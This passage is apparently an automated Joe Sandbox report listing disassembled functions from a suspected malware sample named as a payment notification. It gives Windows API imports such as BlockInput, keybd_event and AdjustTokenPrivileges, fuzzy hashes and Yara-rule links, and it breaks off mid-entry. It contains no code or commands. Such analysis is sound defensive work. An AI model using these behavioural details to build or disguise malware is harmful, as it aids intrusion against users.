Opcode ID: 803a1a6974ff9f4c76a0e2402dd55d4fab926a595c55946fc0c1d629ebb33966
Instruction ID: 298018f0dcdca19e62f4c158aac3157c56a19933be5d822e55ba0381aafe5154
Opcode Fuzzy Hash: 803a1a6974ff9f4c76a0e2402dd55d4fab926a595c55946fc0c1d629ebb33966
Instruction Fuzzy Hash: E2F0F4B1D54309FBDF00DFE49C89EAEBBBCFB08604F504565E901E2181E774AA449A54

Function 00954CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(009628E9,?,00954CBE,009628E9,009F88B8,0000000C,00954E15,009628E9,00000002,00000000,?,009628E9), ref: 00954D09
TerminateProcess.KERNEL32(00000000,?,00954CBE,009628E9,009F88B8,0000000C,00954E15,009628E9,00000002,00000000,?,009628E9), ref: 00954D10
ExitProcess.KERNEL32 ref: 00954D22

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: bcf16210215b68b9a0239b82b8d79719f647b6d6d5390449318ca84bd1cd9ebe
Instruction ID: 2dfcd977253a188fb0e706c099f251293188b20840762fea3a949899b6675ea9
Opcode Fuzzy Hash: bcf16210215b68b9a0239b82b8d79719f647b6d6d5390449318ca84bd1cd9ebe
Instruction Fuzzy Hash: A3E0B671814148ABCF51AF55EE0AE583F79FB81786F148018FC098B162CB36ED86DB90

Function 0096C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0096C36C

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 68328f0f06e3a1bf816597a1065a889c3a0f41c553a07fc3c130da94d509788f
Instruction ID: ad3702935b86841721bf9365298e52c1bea6e0c73a0d389250f7726e76a274af
Opcode Fuzzy Hash: 68328f0f06e3a1bf816597a1065a889c3a0f41c553a07fc3c130da94d509788f
Instruction Fuzzy Hash: 894128B29002196BCB20DFB9DC49EBB777CEB84354F504269F955D7280E6709D418B50

Function 0098D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0098D28C

Strings

X64, xrefs: 0098D2A8

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: b90a7c23a02022719f367b83f79aba520362bd5c4d7a426c0a82fd80634e740f
Instruction ID: 316348211ad3189da34b4c7e1bdafc267fa2bc0c057d32709fe3fbfc0a65c143
Opcode Fuzzy Hash: b90a7c23a02022719f367b83f79aba520362bd5c4d7a426c0a82fd80634e740f
Instruction Fuzzy Hash: E7D0C9B481611DEACF90DB90EC88DD9B77CBB04305F100551F106A2140D73495489F10

Function 0095CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 629f4bb2c76fd1edd26448e1b26e3e3fb13bab6930c56108a9a953b999f20683
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: C6022DB2E002199FDF14CFA9D8806ADBBF5EF88315F258569D819E7380D731AE45CB84

Function 009A68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009A6918
FindClose.KERNEL32(00000000), ref: 009A6961

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 0d0422968f20853bb2e2824c6cb4eee332d8cc2c26730c27c5bf3419bddd6880
Instruction ID: 02fae7ae9ddaab6ddfe1a6a35b5270f14308c7b336a5f2cdd3870f1b946fd5d2
Opcode Fuzzy Hash: 0d0422968f20853bb2e2824c6cb4eee332d8cc2c26730c27c5bf3419bddd6880
Instruction Fuzzy Hash: 5E118E756146009FC710DF69D488A16BBE5EF89328F18C699E4698F6A2CB30EC05CBD1

Function 009A37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,009B4891,?,?,00000035,?), ref: 009A37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,009B4891,?,?,00000035,?), ref: 009A37F4

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 9e789eb78a950ca9d7380a8ccd10eeceb53366b6a19356e13bf360356af653d6
Instruction ID: 1872cac68bf2c71ea0fd6a365faf31b3270f112a774c74d1d3aa828aebe551e5
Opcode Fuzzy Hash: 9e789eb78a950ca9d7380a8ccd10eeceb53366b6a19356e13bf360356af653d6
Instruction Fuzzy Hash: 14F0E5B1A043292BE72057669C4DFEB3AAEEFC5765F004165F50DE2281DAA09904C6F0

Function 0099B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0099B25D
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 0099B270

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: d55bae8f30e163cc1b35dd7b638a6259fdfd8b8267e639fd49233274bf941232
Instruction ID: 3efd4d4b961fccd0e3332a7ae87d5835481233e9efe0a7ff81ec40dbda891b6b
Opcode Fuzzy Hash: d55bae8f30e163cc1b35dd7b638a6259fdfd8b8267e639fd49233274bf941232
Instruction Fuzzy Hash: 5BF01D7181428DABDF059FA4D805BAE7FB4FF04305F00841AF965A5191C37D96119F94

Function 009910BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009911FC), ref: 009910D4
CloseHandle.KERNEL32(?,?,009911FC), ref: 009910E9

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: dd2313e0859cb2847ae17e0ab038614f4bcaa64ba5793c65091449ccd3ee3ff1
Instruction ID: 0bb6d8402de5cc084b4add5ea1a53f4354b0b056d3d9ec2a855307208283e1bc
Opcode Fuzzy Hash: dd2313e0859cb2847ae17e0ab038614f4bcaa64ba5793c65091449ccd3ee3ff1
Instruction Fuzzy Hash: 9EE0BF72418651AEEB252B55FC05F777BA9FB04311F14882DF5A6804B1DB626C90EB50

Function 0093CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00980C40

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 8e547d832639ce6d8d5129cffc637be7f30f30bbf420671f712daef6d8cbc9ee
Instruction ID: 3938e312d3847c19fde6525a68b31d37205204eea7b0cb8dd6147d75b3cd8195
Opcode Fuzzy Hash: 8e547d832639ce6d8d5129cffc637be7f30f30bbf420671f712daef6d8cbc9ee
Instruction Fuzzy Hash: FF328BB4900618DBCF14EF94C885BEEB7B9BF84304F148459E846BB292D735AE49CF51

Function 0096676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00966766,?,?,00000008,?,?,0096FEFE,00000000), ref: 00966998

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: b6a06dcd850eebd5b29a490e44a88c0f669b19cce84fbb9fc952fc497d8cfbb7
Instruction ID: a1be85ffcf21eba59ec2a1130b3a1d5c28cd5e190f99b813a03e4b95c3ec7c80
Opcode Fuzzy Hash: b6a06dcd850eebd5b29a490e44a88c0f669b19cce84fbb9fc952fc497d8cfbb7
Instruction Fuzzy Hash: 64B11A71610609DFD719CF28C48AB657BE0FF45364F298658E8D9CF2A2C735E991CB40

Function 0094B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0098851F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1ccc854eaf70d670a17d4d3275d57986052ca81e0a81a0b938e1d53e08b8978d
Instruction ID: fc1c5243556d8793644011c39d9b3ce148f6d798abef29c18550de83965824d0
Opcode Fuzzy Hash: 1ccc854eaf70d670a17d4d3275d57986052ca81e0a81a0b938e1d53e08b8978d
Instruction Fuzzy Hash: 26124F759002299FCB24DF58C890BEEB7B5FF48710F54819AE849EB255DB349E81CFA0

Function 009AEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 009AEABD

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: f8b59d60d684ef99188f012925884165c4588a1ce4930a0d19ee5b6a49c77f44
Instruction ID: da4b3ecdb2c7dd9bdcab79cc5b5938091dd218918dcf4db9c4bd2a96f9e288ee
Opcode Fuzzy Hash: f8b59d60d684ef99188f012925884165c4588a1ce4930a0d19ee5b6a49c77f44
Instruction Fuzzy Hash: E0E01A762102049FC710EF59D808E9ABBE9AF99760F00841AFD49DB351DA70AC408B91

Function 009509D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009503EE), ref: 009509DA

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d7aea61d78d2e76dc685ca3c65a310f3a91099e58f6e2f1cabdb26393fcff784
Instruction ID: 3f730be300549a7c87f62c2950f5a8d1e9e904c26257c4fb33ab0d0ab28f158e
Opcode Fuzzy Hash: d7aea61d78d2e76dc685ca3c65a310f3a91099e58f6e2f1cabdb26393fcff784
Instruction Fuzzy Hash:

Function 0095781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0095798B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 3d6e6147af1f8d94a500bd569669e0540e3a861d234873b5358d73fd0dfce012
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: C051376160C6056BDB38C5EBB8A97BFE38D9B52342F180909DE86D7282C615DF0DD362

Function 00966DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f3ca0f149e75f2cd28a05d3b73a2032687310618817b2b8fc1d6554dda20c6
Instruction ID: 643edf8f93cedc7a737486dd50bacb117df6d7bdf5d8876a561e1aff16e98b40
Opcode Fuzzy Hash: e8f3ca0f149e75f2cd28a05d3b73a2032687310618817b2b8fc1d6554dda20c6
Instruction Fuzzy Hash: 29320222D6EF414DD7239634C822336A349AFB73C9F25D727F82AB59A5EB29C4C35100

Function 0094CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc66d7ef82ce91cc3e74f707d3daa95d4345a0bdf2523eb78cc407c5029d557
Instruction ID: 38459388afd37987a6de92ecc52783a8a2d369f8a78c227309229f99afd4bf27
Opcode Fuzzy Hash: 7fc66d7ef82ce91cc3e74f707d3daa95d4345a0bdf2523eb78cc407c5029d557
Instruction Fuzzy Hash: A73239F1A041058FDF28EF28C4E4A7D77A9EB45302F28896AD599DB391D338DD81DB60

Function 00937920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 767cd5452c12ef45c90b54a47fe683556618092fdbbf5e493c2f2c87c0bb4f07
Instruction ID: cb1001ab42c6fee24571bbbd09e505565f543dfe772fcd2839a7db5e5e38e3a6
Opcode Fuzzy Hash: 767cd5452c12ef45c90b54a47fe683556618092fdbbf5e493c2f2c87c0bb4f07
Instruction Fuzzy Hash: B3228EB1A0460ADFDF14CFA4C881BAEF7B5FF44300F248529E816A7291EB79A955CF50

Function 009391C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53ee11ed6bbc32b6b3582ca53af2f4c155a676952f51ba0d8315141c63590f8d
Instruction ID: 1335007f78002541ad4292a9c7f8d51c8cbd8d0a48ed408c34d303de2f3fe809
Opcode Fuzzy Hash: 53ee11ed6bbc32b6b3582ca53af2f4c155a676952f51ba0d8315141c63590f8d
Instruction Fuzzy Hash: A802B6B1E0010AEBDB05DF54D881BAEB7B5FF48300F50C569E81A9B291EB75AE14CF91

Function 00951C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: c991c94bb0df036bb6f21f4798a6b4676e9055479d65b020361f170e11dadfb6
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 169165721080A34ADB29C63B857567EFFF55A923A371A079DDCF2CA1C1EE14895CD720

Function 009519B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 22de606cc16db06cf193523769104b57e20ba2f5ce0a817c399d20d5927762bc
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 7F9173722090A34ADB2E827B957423DFFE55A923A371A079ED8F2CA1C5FE14C55CD720

Function 00957A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
